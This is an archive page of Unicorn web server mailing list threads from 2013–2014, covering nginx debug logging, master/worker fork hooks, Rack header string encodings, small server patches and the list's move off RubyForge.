> > My app logs (shared/log/production.log) and /var/log/nginx/error.log both
> > are empty
>
> I'm not up-to-date on Rails logging these days (see Rails docs if nobody
> else answers), but for nginx, you can use this to increase verbosity:
>
>         error_log /path/to/nginx/error.log debug
>
> ref: http://nginx.org/en/docs/ngx_core_module.html#error_log
>
> In unicorn, you can also bypass nginx for debugging purposes by
> setting up another listener on any port you want:
>
>         listen 12345
>


^ permalink raw reply	[relevance 0%]

* Re: Having issue with Unicorn
  @ 2014-10-24 20:58  5%                   ` Eric Wong
  2014-10-24 21:24  0%                     ` Imdad
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-10-24 20:58 UTC (permalink / raw)
  To: Imdad; +Cc: unicorn-public

Imdad <khanimdad@gmail.com> wrote:
> My app logs (shared/log/production.log) and /var/log/nginx/error.log both
> are empty

I'm not up-to-date on Rails logging these days (see Rails docs if nobody
else answers), but for nginx, you can use this to increase verbosity:

	error_log /path/to/nginx/error.log debug

ref: http://nginx.org/en/docs/ngx_core_module.html#error_log

In unicorn, you can also bypass nginx for debugging purposes by
setting up another listener on any port you want:

	listen 12345

^ permalink raw reply	[relevance 5%]

* Reserved workers not as webservers
@ 2014-10-09 12:24  4% Bráulio Bhavamitra
  0 siblings, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2014-10-09 12:24 UTC (permalink / raw)
  To: unicorn-public

Hello all,

I'm quite amazed of how preloading and fork and reduce memory usage.
Making it use even less memory and restarting the app faster, the next
step would be incorporate other daemons (also part of the app, in my
case delayed_job and feed-updater) AS unicorn workers.

This would be very interesting as restarting unicorn would also
restart these daemons.
Another benefit of incorporating daemons into unicorn is sharing pidfile.

For it to work properly I would have to reserve some workers for these
daemons. Today, I would simple do a condition on worker.nr and apply a
specific code to start the daemon. Maybe better would be to have a
different type of worker designed for this.

But something I don't know how to do is to disable http requests to be
forwared to these workers. How could I do it?

Have you ever thought in doing this?

best regards,
bráulio

^ permalink raw reply	[relevance 4%]

* Re: Master hooks needed
  2014-10-03 12:22  4% ` Eric Wong
  2014-10-03 12:36  0%   ` Valentin Mihov
@ 2014-10-04  0:53  0%   ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2014-10-04  0:53 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

The problem is actually worser, and the worker.nr == 0 can't be used.
I had to do something like this:

master_run = true

before_fork do |server, worker|
  if master_run
     #warm up server...

     #kill old pid...

     #disconnect active record

     master_run = false
  end

  # other stuff for each worker
end

In the last example, using worker.nr == 0 would make the server crash
in case the worker 0 was killed/restarted.

Also the AR's disconnect and *many other stuff* people put on
before_fork should only be run once the master was preloaded, not for
every worker.

So I still think at least a hook like master_preloaded(server) is necessary.

cheers,
bráulio

On Fri, Oct 3, 2014 at 9:22 AM, Eric Wong <e@80x24.org> wrote:
> Bráulio Bhavamitra <braulio@eita.org.br> wrote:
>> Hello all,
>>
>> If I need to hook something after master load, I'm currently doing:
>>
>> before_fork do |server, worker|
>>   # worker 0 is the first to init, so hold the master here
>>   if worker.nr == 0
>>      #warm up server...
>>
>>      #kill old pid...
>>   end
>>
>>   # other stuff for each worker
>> end
>>
>> Both operations I currently do (server warm up and old pid kill) need
>> to be run only once, and not for every worker as before_fork does,
>> that's why I had to put the condition seen above.
>
> The above is fine if your first worker never dies.  I think you can add
> a local variable to ensure it only runs the first time worker.nr == 0 is
> started, in case a worker dies.  Something like:
>
>     first = true
>     before_fork do |server, worker|
>       # worker 0 is the first to init, so hold the master here
>       if worker.nr == 0 && first
>          first = false
>          #warm up server...
>
>          #kill old pid...
>       end
>
>       # other stuff for each worker
>     end
>
> For what it's worth, I'm not a fan of auto-killing the old PID in the
> unicorn config and regret having it in the example config.  It's only
> for the most memory-constrained configs and fragile (because anything
> with pid files is always fragile).
>
>> So hooks for master is needed, something like
>> master_after_load(server) and master_init(server).
>>
>> What do you think?
>
> rack.git also has a Rack::Builder#warmup method.  Aman originally
> proposed it for unicorn, but it's useful outside of unicorn so
> we moved it to Rack.
>
> In general, I'm against adding new hooks/options because they tend to
> make maintainability and documentation harder for ops folks.
> I still have nightmares of some Capistrano config filled with hooks
> from years ago :x
>
> Features like these also makes migrating away from unicorn harder, so
> that is another reason we ended up adding #warmup to Rack and not
> unicorn.

^ permalink raw reply	[relevance 0%]

* Re: Master hooks needed
  2014-10-03 12:22  4% ` Eric Wong
@ 2014-10-03 12:36  0%   ` Valentin Mihov
  2014-10-04  0:53  0%   ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Valentin Mihov @ 2014-10-03 12:36 UTC (permalink / raw)
  To: Eric Wong; +Cc: Bráulio Bhavamitra, unicorn-public

On Fri, Oct 3, 2014 at 3:22 PM, Eric Wong <e@80x24.org> wrote:
>
> Bráulio Bhavamitra <braulio@eita.org.br> wrote:
> > Hello all,
> >
> > If I need to hook something after master load, I'm currently doing:
> >
> > before_fork do |server, worker|
> >   # worker 0 is the first to init, so hold the master here
> >   if worker.nr == 0
> >      #warm up server...
> >
> >      #kill old pid...
> >   end
> >
> >   # other stuff for each worker
> > end
> >
> > Both operations I currently do (server warm up and old pid kill) need
> > to be run only once, and not for every worker as before_fork does,
> > that's why I had to put the condition seen above.
>
> The above is fine if your first worker never dies.  I think you can add
> a local variable to ensure it only runs the first time worker.nr == 0 is
> started, in case a worker dies.  Something like:
>
>     first = true
>     before_fork do |server, worker|
>       # worker 0 is the first to init, so hold the master here
>       if worker.nr == 0 && first
>          first = false
>          #warm up server...
>
>          #kill old pid...
>       end
>
>       # other stuff for each worker
>     end
>
> For what it's worth, I'm not a fan of auto-killing the old PID in the
> unicorn config and regret having it in the example config.  It's only
> for the most memory-constrained configs and fragile (because anything
> with pid files is always fragile).
>
> > So hooks for master is needed, something like
> > master_after_load(server) and master_init(server).
> >
> > What do you think?
>
> rack.git also has a Rack::Builder#warmup method.  Aman originally
> proposed it for unicorn, but it's useful outside of unicorn so
> we moved it to Rack.
>
> In general, I'm against adding new hooks/options because they tend to
> make maintainability and documentation harder for ops folks.
> I still have nightmares of some Capistrano config filled with hooks
> from years ago :x
>
> Features like these also makes migrating away from unicorn harder, so
> that is another reason we ended up adding #warmup to Rack and not
> unicorn.
>

Isn't it much better to do the warmup in an initializer instead in
unicorn? This way you can preload_app=true and the master will execute
the warmup code and fork. Killing the old pid is probably stopping you
from do that, right?

--Valentin

^ permalink raw reply	[relevance 0%]

* Re: Master hooks needed
  @ 2014-10-03 12:22  4% ` Eric Wong
  2014-10-03 12:36  0%   ` Valentin Mihov
  2014-10-04  0:53  0%   ` Bráulio Bhavamitra
  0 siblings, 2 replies; 200+ results
From: Eric Wong @ 2014-10-03 12:22 UTC (permalink / raw)
  To: Bráulio Bhavamitra; +Cc: unicorn-public

Bráulio Bhavamitra <braulio@eita.org.br> wrote:
> Hello all,
> 
> If I need to hook something after master load, I'm currently doing:
> 
> before_fork do |server, worker|
>   # worker 0 is the first to init, so hold the master here
>   if worker.nr == 0
>      #warm up server...
> 
>      #kill old pid...
>   end
> 
>   # other stuff for each worker
> end
> 
> Both operations I currently do (server warm up and old pid kill) need
> to be run only once, and not for every worker as before_fork does,
> that's why I had to put the condition seen above.

The above is fine if your first worker never dies.  I think you can add
a local variable to ensure it only runs the first time worker.nr == 0 is
started, in case a worker dies.  Something like:

    first = true
    before_fork do |server, worker|
      # worker 0 is the first to init, so hold the master here
      if worker.nr == 0 && first
         first = false
         #warm up server...

         #kill old pid...
      end

      # other stuff for each worker
    end

For what it's worth, I'm not a fan of auto-killing the old PID in the
unicorn config and regret having it in the example config.  It's only
for the most memory-constrained configs and fragile (because anything
with pid files is always fragile).

> So hooks for master is needed, something like
> master_after_load(server) and master_init(server).
> 
> What do you think?

rack.git also has a Rack::Builder#warmup method.  Aman originally
proposed it for unicorn, but it's useful outside of unicorn so
we moved it to Rack.

In general, I'm against adding new hooks/options because they tend to
make maintainability and documentation harder for ops folks.
I still have nightmares of some Capistrano config filled with hooks
from years ago :x

Features like these also makes migrating away from unicorn harder, so
that is another reason we ended up adding #warmup to Rack and not
unicorn.

^ permalink raw reply	[relevance 4%]

* Re: Rack encodings (was: Please move to github)
  2014-08-05  5:56  4% Gary Grossman
@ 2014-08-05  6:28  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-08-05  6:28 UTC (permalink / raw)
  To: Gary Grossman; +Cc: hongli, unicorn-public, michael, mfischer

Gary Grossman <gary.grossman@gmail.com> wrote:
> It feels like we were getting some momentum here on an important but
> long-dormant issue here... maybe it's time to move this discussion
> to rack-devel?

Sure, rack-devel is a pretty dormant mailing list but there's been a
burst of activity a few weeks ago.

Unlike this list, subscription is required to post; and first posts
from newbies are moderated.  For folks who do not login to Google
(crazies like me :P) subscription is possible without any login
or password: rack-devel+subscribe@googlegroups.com

> Perhaps there's another Rack luminary who can lead
> the charge, or at least see if there's some consensus after a few
> more years of shared experience on what "sane" encodings might
> look like.

At least there's other server implementers who'll probably
chime in.

> A lightweight way to move the implementation forward might be a
> simple Rack middleware gem which sets the new encodings on the 
> environment, or adding the functionality to rack itself. Once
> developers were comfortable with the new regime, the app servers
> could follow suit and put those encodings in the env natively,
> and the Rubyland implementation of the new encodings could be
> dropped.

Sounds like a good plan.  Thanks for bringing more attention to this.

^ permalink raw reply	[relevance 0%]

* Re: Rack encodings (was: Please move to github)
@ 2014-08-05  5:56  4% Gary Grossman
  2014-08-05  6:28  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Gary Grossman @ 2014-08-05  5:56 UTC (permalink / raw)
  To: hongli; +Cc: unicorn-public, michael, e, mfischer, gary.grossman

It feels like we were getting some momentum here on an important but
long-dormant issue here... maybe it's time to move this discussion
to rack-devel? Perhaps there's another Rack luminary who can lead
the charge, or at least see if there's some consensus after a few
more years of shared experience on what "sane" encodings might
look like.

A lightweight way to move the implementation forward might be a
simple Rack middleware gem which sets the new encodings on the 
environment, or adding the functionality to rack itself. Once
developers were comfortable with the new regime, the app servers
could follow suit and put those encodings in the env natively,
and the Rubyland implementation of the new encodings could be
dropped.

Gary


^ permalink raw reply	[relevance 4%]

* Re: Rack encodings (was: Please move to github)
  2014-08-04  8:48  6%         ` Rack encodings (was: Please move to github) Eric Wong
@ 2014-08-04  9:46  0%           ` Hongli Lai
  0 siblings, 0 replies; 200+ results
From: Hongli Lai @ 2014-08-04  9:46 UTC (permalink / raw)
  To: Eric Wong; +Cc: Michael Fischer, Gary Grossman, unicorn-public, Michael Grosser

On Mon, Aug 4, 2014 at 10:48 AM, Eric Wong <e@80x24.org> wrote:
> Fair enough.  Would you/Phusion be comfortable taking the lead here?
> This feels like another "hot potato" issue :>

Unfortunately, we're too busy with a major project to be able to lead
this effort.

-- 
Phusion | Web Application deployment, scaling, and monitoring solutions

Web: http://www.phusion.nl/
E-mail: info@phusion.nl
Chamber of commerce no: 08173483 (The Netherlands)

^ permalink raw reply	[relevance 0%]

* Rack encodings (was: Please move to github)
  @ 2014-08-04  8:48  6%         ` Eric Wong
  2014-08-04  9:46  0%           ` Hongli Lai
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-08-04  8:48 UTC (permalink / raw)
  To: Hongli Lai
  Cc: Michael Fischer, Gary Grossman, unicorn-public, Michael Grosser

(Long overdue Subject: change)

Hongli Lai <hongli@phusion.nl> wrote:
> Hi guys. Phusion Passenger author here. I would very much support
> standardization of encoding issues.

> At this point, I don't really care what the standard is, as long as
> it's a sane standard that everybody can follow.

Fair enough.  Would you/Phusion be comfortable taking the lead here?
This feels like another "hot potato" issue :>

> In my opinion, following Encoding.default_external is not helpful.
> Most users have absolutely no idea how to configure
> Encoding.default_external, or even know that it exists. I've also
> never, ever seen anybody who does *not* want default_external to be
> UTF-8. If it's not set to UTF-8, then it's always by accident (e.g.
> the user not knowing that it depends on LC_CTYPE, that LC_CTYPE is set
> differently in the shell than from an init script, or even what
> LC_CTYPE is).

Perhaps we need to educate users to set LC_CTYPE/LC_ALL/LANG so
Encoding.default_external works as intended?  Adding another
option to Rack will just as likely to get missed.

Maybe servers could emit a big warning saying:

    WARNING: Encoding.default_external is not UTF-8 ...

And add a --quiet-utf8-warning option for the few folks who really do
not want UTF-8.

^ permalink raw reply	[relevance 6%]

* Re: Please move to github
  2014-08-02  8:50  3% ` Eric Wong
@ 2014-08-02 19:07  0%   ` Gary Grossman
    0 siblings, 1 reply; 200+ results
From: Gary Grossman @ 2014-08-02 19:07 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, michael

Hi Eric,

Thanks for your reply and for reviewing the patch!

>Right, the Rack spec does not dictate this.  Doing this out-of-spec has
>the ability to break existing apps as well as compatibility with other
>app servers.

It's true, my patch is too naive since it's a pretty drastic change
in behavior not behind any kind of switch.

>What do other app servers do?

I did a little survey. ASCII-8BIT is kind of the de facto standard
even if it's not mandated by the Rack specification. Phusion
Passenger, Thin and WEBrick all send mostly ASCII-8BIT strings in
the env.

>My main concern is having more different behavior between various Rack
>servers servers, making it harder to switch between them.

Very valid; Rack wouldn't be much of a standard if there were a bunch
of variants in use.

>Another concern is breaking apps which are already working around this
>but work with non-UTF-8 encodings.

We'd pretty much need to introduce some kind of configuration
switch, at least for the short term and maybe for the long term.
The hope would be that it could become the default setting.
Apps that don't use UTF8 should be able to set their desired default
external encoding appropriately.

>The rack-devel mailing list had a discussion on this in September 2010
>and a decision was never reached. You can search the archives at:
>http://groups.google.com/group/rack-devel

I came across this thread but didn't realize that was the last word
so far when it came to Rack and encodings.

This might be one of those instances where it would be helpful for
implementation to lead specification. Unicorn is one of the leading
servers of its genre, if not the leader. If you supported a switch
that made the encoding regime more sane, I think other popular servers
like Thin and Passenger would swiftly follow and it might re-energize
the discussion about getting encodings into the Rack spec once and
for all, and give a base for experimentation and iteration for
getting the encodings in the spec right.

There's a lot of developer pain here. Many apps probably are serving
up encoding-related 500 errors without knowing it. There are
stories of developers adding "# encoding" everywhere, setting
the external/internal encoding, and then "things are fine until it
blows up somewhere else." I heard recently that a very large company
has stuck with Ruby 1.8.7, probably to avoid these encoding issues
among other things. It would be nice to improve the situation.

>Disclaimer: I am not an encoding expert, so for that reason I prefer
>to let other Rack folks make the decision.

I'm not an encoding expert either! Most people aren't... which is
why it'd be nice if they didn't have to know so much about it when
they write a Rack app!

>Do you have performance measurements for doing this as pure-Ruby
>middleware vs your patch?

I don't have measurements currently but I'll get some.
Our app is several years old and so there's a lot of stuff in
request.env by the time we get around to forcing everything to
UTF8 encoding. I wouldn't be surprised if the hit on
every single request is small but significant for us.

>So it should be best if there were a way to do this for all Rack
>servers.

Thanks again for reviewing the patch. I'll work on a new patch that
incorporates your comments and has a switch for enabling/disabling
the functionality, and I'll try to follow roughly what the spec
group in 2010 thought would make sense in terms of encodings for
the various strings in the env. And I'll see if I can ask the
Rack folks to chime in.

Gary


^ permalink raw reply	[relevance 0%]

* Re: Please move to github
  @ 2014-08-02  8:50  3% ` Eric Wong
  2014-08-02 19:07  0%   ` Gary Grossman
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-08-02  8:50 UTC (permalink / raw)
  To: Gary Grossman; +Cc: unicorn-public, michael

Gary Grossman <gary.grossman@gmail.com> wrote:
> Hi Eric,
> 
> I work with Michael, and this discussion sure got off on the
> wrong foot... we love unicorn and use it heavily, and just
> want to contribute back to it.

No worries, cultural differences happen.  Thanks for following up.

> To detail the encoding problem we were trying to fix, unicorn
> uses rb_str_new in several places to create Ruby strings.
> For Ruby 1.9 and later, these strings are assigned ASCII-8BIT
> encoding.
> 
> While the Rack specification doesn't dictate what encoding
> should be used for strings in the environment, many
> developers would probably expect the default external encoding
> setting in Encoding.default_external to be used.

Right, the Rack spec does not dictate this.  Doing this out-of-spec has
the ability to break existing apps as well as compatibility with other
app servers.

What do other app servers do?

My main concern is having more different behavior between various Rack
servers servers, making it harder to switch between them.

Another concern is breaking apps which are already working around this
but work with non-UTF-8 encodings.

The rack-devel mailing list had a discussion on this in September 2010
and a decision was never reached. You can search the archives at:
http://groups.google.com/group/rack-devel

I've also saved the thread to a mbox at
http://80x24.org/rack-devel-encoding-2010.mbox.gz
since Google Groups archives are a bit painful to navigate.

Disclaimer: I am not an encoding expert, so for that reason I prefer
to let other Rack folks make the decision.

> Many Rails applications use UTF8 heavily. The use of ASCII-8BIT
> in the env can lead to Encoding::CompatibilityErrors being
> raised when a UTF8 string and ASCII-8BIT string are concatenated,
> which happens frequently when properties like request.url are
> referenced in erb templates. To get around these problems,
> an app would have to force encoding on the strings in the env
> manually. It seems a shame to do this in slower Ruby code when
> it could be done up front by unicorn.

Yes, this existing behavior sucks on UTF-8-heavy apps.  I would rather
not add more unicorn-only options which make switching between servers
harder.

Do you have performance measurements for doing this as pure-Ruby
middleware vs your patch?

My dislike of lock-in also applies to app servers.  Application-visible
differences like these should be avoided so people can switch between
servers, too.

So it should be best if there were a way to do this for all Rack
servers.

> We'd like to propose that unicorn use rb_external_str_new to
> make strings instead of rb_str_new.
> 
> Perhaps you have your reasons for continuing to use rb_str_new
> but we figured we'd run this by you.

If the Rack spec mandated encodings, I would do it in a heartbeat.

> Subject: [PATCH] If unicorn is used with Ruby 1.9 or later, use
>  rb_external_str_new instead of rb_str_new to create strings. The resulting
>  strings will use the default external encoding. Continue using rb_str_new for
>  older versions of Ruby.

A better, shorter, more direct subject would be:

Subject: use Encoding.default_external for header values

Commit message body is fine <snip>

> +#ifdef HAVE_RUBY_ENCODING_H
> +/* Use default external encoding for strings for Ruby 1.9+,
> + * fall back to rb_str_new when unavailable */
> +#define rb_str_new rb_external_str_new
> +#endif

This is too heavy-handed, as some strings (buffers) may
need to stay binary via rb_str_new.  If we were to do this, it would
something like:

#ifdef HAVE_RUBY_ENCODING_H
#  define env_val_new(ptr,len) rb_external_str_new((ptr),(len))
#else
#  define env_val_new(ptr,len) rb_str_new((ptr),(len))
#endif

... And only making sure header values are set to external.

Last I checked the HTTP RFCs (it's been a while) header keys are
required to be US-ASCII-only (and our parser enforces that).

> +  def test_encoding
> +    if ''.respond_to?(:encoding)
> +      client = MockRequest.new("GET http://e:3/x?y=z HTTP/1.1\r\n" \
> +                               "Host: foo\r\n\r\n")
> +      env = @request.read(client)
> +      encoding = Encoding.default_external
> +      assert_equal encoding, env['REQUEST_PATH'].encoding
> +      assert_equal encoding, env['PATH_INFO'].encoding
> +      assert_equal encoding, env['QUERY_STRING'].encoding
> +    end

This would need to test and work with (and appropriately reject)
invalid requests with bad encodings, too.

^ permalink raw reply	[relevance 3%]

* Re: Dealing with big uploads and/or slow clients
  @ 2014-06-06  5:59  5%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-06-06  5:59 UTC (permalink / raw)
  To: Sam Saffron; +Cc: Bráulio Bhavamitra, unicorn-public

Sam Saffron <sam.saffron@gmail.com> wrote:
> Wouldn't you just use Rack Hijack for this, you can easily pull the
> socket out of the pipeline and then deal with the upload via
> eventmachine or what not.

Sure, but is that something that can Bráulio can drop in and use right
away?  I expect he's already running nginx.

If he's going to be doing that, probably easier to just another
server altogether.  yahns[1] is pretty great for that.

[1] http://yahns.yhbt.net/README  (the unicorn site has been running on
    it since November)

^ permalink raw reply	[relevance 5%]

* Re: [ANN] unicorn 4.8.3 - the end of an era
  2014-05-07 20:33  6%     ` Michael Fischer
@ 2014-05-07 21:25  0%       ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-05-07 21:25 UTC (permalink / raw)
  To: Michael Fischer
  Cc: Eric Wong, Jérémy Lecour, Liste Unicorn, unicorn-public

Michael Fischer <mfischer@zendesk.com> wrote:
> Is there some compelling reason why the mailing list simply cannot be
> moved to another provider?  IMHO your users and fellow developers
> shouldn't have to do anything other than change the submission
> address.

We would need to migrate again if/when that provider goes dead or
service starts deteriorating.  Ease-of-migration and being forkable
again in the future was the top priority.

If I'm hit by a bus or start allowing too much spam, it should be
trivially easy to migrate the project[1] and all its archives and
infrastructure.

> I respect your desire to power the communication platform with free
> software (and I'm sure this can still be done with Mailman or
> whatever), but keep in mind the practical reality of our time, where
> most of us these days are now comfortably using Webmail or or POP/IMAP
> against a remote server that's not under the user's control and have
> no desire to implement yet another communication conduit.

I will probably take the addresses of active subscribers who've posted
here[2] imported into the new delivery system, even.

It would be great to be able to make the list of ML subscribers public,
too, to ensure forkability.  I'm not sure how the lurkers will react to
that, though...


[1] of course, whoever takes over may not be a Free Software zealot
    like myself.
[2] those addresses are already public, but lurkers will probably
    have to resubscribe (or use ssoma or the Atom feed).

^ permalink raw reply	[relevance 0%]

* Re: [ANN] unicorn 4.8.3 - the end of an era
  @ 2014-05-07 20:33  6%     ` Michael Fischer
  2014-05-07 21:25  0%       ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2014-05-07 20:33 UTC (permalink / raw)
  To: Eric Wong; +Cc: Jérémy Lecour, Liste Unicorn, unicorn-public

On Wed, May 7, 2014 at 2:46 AM, Eric Wong <e@80x24.org> wrote:

> Jérémy Lecour <jeremy.lecour@gmail.com> wrote:
> > Would you mind explaining what a regular subscriber has to do to keep
> > receiving those emails in their inbox?
>
> You use ssoma[1] to to import mail into your inbox.  This is like how
> slrnpull works with NNTP or getmail/fetchmail works with POP.  It's
> only a one-way sync, but you can import it into an IMAP folder.
>
> Currently there's no SMTP delivery component, but I could probably set
> one up this week if there's enough demand for one.  The subscriber list
> will be public, though.

Is there some compelling reason why the mailing list simply cannot be
moved to another provider?  IMHO your users and fellow developers
shouldn't have to do anything other than change the submission
address.

I respect your desire to power the communication platform with free
software (and I'm sure this can still be done with Mailman or
whatever), but keep in mind the practical reality of our time, where
most of us these days are now comfortably using Webmail or or POP/IMAP
against a remote server that's not under the user's control and have
no desire to implement yet another communication conduit.

Thanks,

--Michael

^ permalink raw reply	[relevance 6%]

* Re: [ANN] unicorn 4.8.3 - the end of an era
    @ 2014-05-07 12:08  5% ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2014-05-07 12:08 UTC (permalink / raw)
  To: Eric Wong; +Cc: Unicorn, unicorn-public

+1, pushing to ssoma when emails standards empire is very strong is
way too much...

Another mailing list in another server should be created...

regards,
bráulio

On Wed, May 7, 2014 at 5:05 AM, Eric Wong <e@80x24.org> wrote:
> Changes:
>
> This release updates documentation to reflect the migration of the
> mailing list to a new public-inbox[1] instance.  This is necessary
> due to the impending RubyForge shutdown on May 15, 2014.
>
> The public-inbox address is: unicorn-public@bogomips.org
>     (no subscription required, plain text only)
> ssoma[2] git archives: git://bogomips.org/unicorn-public
> browser-friendly archives: http://bogomips.org/unicorn-public/
>
> Using, getting help for, and contributing to unicorn will never
> require any of the following:
>
> 1) non-Free software (including SaaS)
> 2) registration or sign-in of any kind
> 3) a real identity (we accept mail from Mixmaster)
> 4) a graphical user interface
>
> Nowadays, plain-text email is the only ubiquitous platform which
> meets all our requirements for communication.
>
> There is also one small bugfix to handle premature grandparent death
> upon initial startup.  Most users are unaffected.
>
> [1] policy: http://public-inbox.org/ - git://80x24.org/public-inbox
>     an "archives first" approach to mailing lists
> [2] mechanism: http://ssoma.public-inbox.org/ - git://80x24.org/ssoma
>     some sort of mail archiver (using git)
>
> * http://unicorn.bogomips.org/
> * unicorn-public@bogomips.org
> * git://bogomips.org/unicorn.git
> * http://unicorn.bogomips.org/NEWS.atom.xml
>
> --
> Eric Wong
> __
> http://bogomips.org/unicorn-public/ - unicorn-public@bogomips.org
> please quote as little as necessary when replying



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é
meu lar e todos nós somos cidadãos deste cosmo. Este universo é a
imaginação da Mente Macrocósmica, e todas as entidades estão sendo
criadas, preservadas e destruídas nas fases de extroversão e
introversão do fluxo imaginativo cósmico. No âmbito pessoal, quando
uma pessoa imagina algo em sua mente, naquele momento, essa pessoa é a
única proprietária daquilo que ela imagina, e ninguém mais. Quando um
ser humano criado mentalmente caminha por um milharal também
imaginado, a pessoa imaginada não é a propriedade desse milharal, pois
ele pertence ao indivíduo que o está imaginando. Este universo foi
criado na imaginação de Brahma, a Entidade Suprema, por isso a
propriedade deste universo é de Brahma, e não dos microcosmos que
também foram criados pela imaginação de Brahma. Nenhuma propriedade
deste mundo, mutável ou imutável, pertence a um indivíduo em
particular; tudo é o patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia

^ permalink raw reply	[relevance 5%]

* [RFC/PATCH] http_server: handle premature grandparent death
@ 2014-05-02 23:15  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-05-02 23:15 UTC (permalink / raw)
  To: mongrel-unicorn, unicorn-public

When daemonizing, it is possible for the grandparent to be
terminated by another process before the master can notify
it.  Do not abort the master in this case.

This may fix the following issue:

	https://github.com/kostya/eye/issues/49

(which I was notified of privately via email)
---
 Will push and tag 4.8.3 this weekend (along with mailing list change).

 lib/unicorn/http_server.rb | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 21cb9a1..a0ca302 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -272,7 +272,11 @@ def join
     proc_name 'master'
     logger.info "master process ready" # test_exec.rb relies on this message
     if @ready_pipe
-      @ready_pipe.syswrite($$.to_s)
+      begin
+        @ready_pipe.syswrite($$.to_s)
+      rescue => e
+        logger.warn("grandparent died too soon?: #{e.message} (#{e.class})")
+      end
       @ready_pipe = @ready_pipe.close rescue nil
     end
     begin
-- 
Eric Wong

^ permalink raw reply related	[relevance 4%]

* listen loop error in 4.8.0
@ 2014-01-27 16:56  5% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-01-27 16:56 UTC (permalink / raw)
  To: mongrel-unicorn

Hey all, I'm trying to diagnose an issue with another user over
private email.

It seems io.close in the trap(:QUIT) handler of the worker process is
causing an IOError, which means an IO in the readers array already got
closed somehow.  This shouldn't happen, and CRuby 2.x doesn't seem
to interrupt itself inside signal handlers[1].

Below is what I have so far...

Worst case is we're not any worse off than before; but we
could be hiding another bug with the "rescue nil" on io.close.

An extra set of eyes would be appreciated.

Pushed to the llerrloop branch of git://bogomips.org/unicorn.git
Also on rubygems.org: gem install --pre -v 4.8.0.1.g10a2 unicorn

[1] - however other Ruby runtimes may.

Subject: [PATCH] http_server: safer SIGQUIT handler for worker

This protects us from two potential errors:

1) we (or our app) somehow called IO#close on one of the sockets
   we listen on without removing it from the readers array.
   We'll ignore IOErrors from IO#close and assume we wanted to
   close it.

2) our SIGQUIT handler is interrupted by itself.  This is currently
   not possible with (MRI) Ruby 2.x, but it may happen in other
   implementations (as it does in normal C code).
---
 lib/unicorn/http_server.rb | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index ae8ad13..2052d53 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -591,6 +591,13 @@ class Unicorn::HttpServer
   EXIT_SIGS = [ :QUIT, :TERM, :INT ]
   WORKER_QUEUE_SIGS = QUEUE_SIGS - EXIT_SIGS
 
+  def nuke_listeners!(readers)
+    # only called from the worker, ordering is important here
+    tmp = readers.dup
+    readers.replace([false]) # ensure worker does not continue ASAP
+    tmp.each { |io| io.close rescue nil } # break out of IO.select
+  end
+
   # gets rid of stuff the worker has no business keeping track of
   # to free some resources and drops all sig handlers.
   # traps for USR1, USR2, and HUP may be set in the after_fork Proc
@@ -618,7 +625,7 @@ class Unicorn::HttpServer
     @after_fork = @listener_opts = @orig_app = nil
     readers = LISTENERS.dup
     readers << worker
-    trap(:QUIT) { readers.each { |io| io.close }.replace([false]) }
+    trap(:QUIT) { nuke_listeners!(readers) }
     readers
   end
 
@@ -677,7 +684,7 @@ class Unicorn::HttpServer
       worker.tick = Time.now.to_i
       ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
     rescue => e
-      redo if nr < 0
+      redo if nr < 0 && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
     end while readers[0]
   end
-- 
1.8.5.3.368.gab0bcec
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 5%]

* Re: [PATCH] rework master-to-worker signaling to use a pipe
  @ 2013-12-10  1:58  4%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-12-10  1:58 UTC (permalink / raw)
  To: unicorn list

Sam Saffron <sam.saffron@gmail.com> wrote:
> Bottom line is that your change is not really required.

OK.  However, the other benefit of the change is that master process
death can be detected much sooner.  (The per-process open file limit
issue doesn't really bother me with my change, since the overall kernel
pipe usage does not change).

I suppose ruby-pg users can do something like:

	trap(:EXIT) { pg.cancel }

if they really want to be able to abort in-progress queries

> Thanks you so much for being super responsive here. Sorry if I caused
> you to go on a tangent you did need to go on.

No worries, I was already using a similar method to (only) detect master
process death in another master-worker server.  Anyways, there's nothing
pg-specific to it and I was always slightly worried signals would cause
some buggy code behave incorrectly in the face of EINTR (though most of
C Ruby + extensions seem well-behaved in that regard).

So I'm likely to go forward with it (if not for unicorn 4.8, then 5.0)

Thanks for bringing this issue to everyone's attention.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
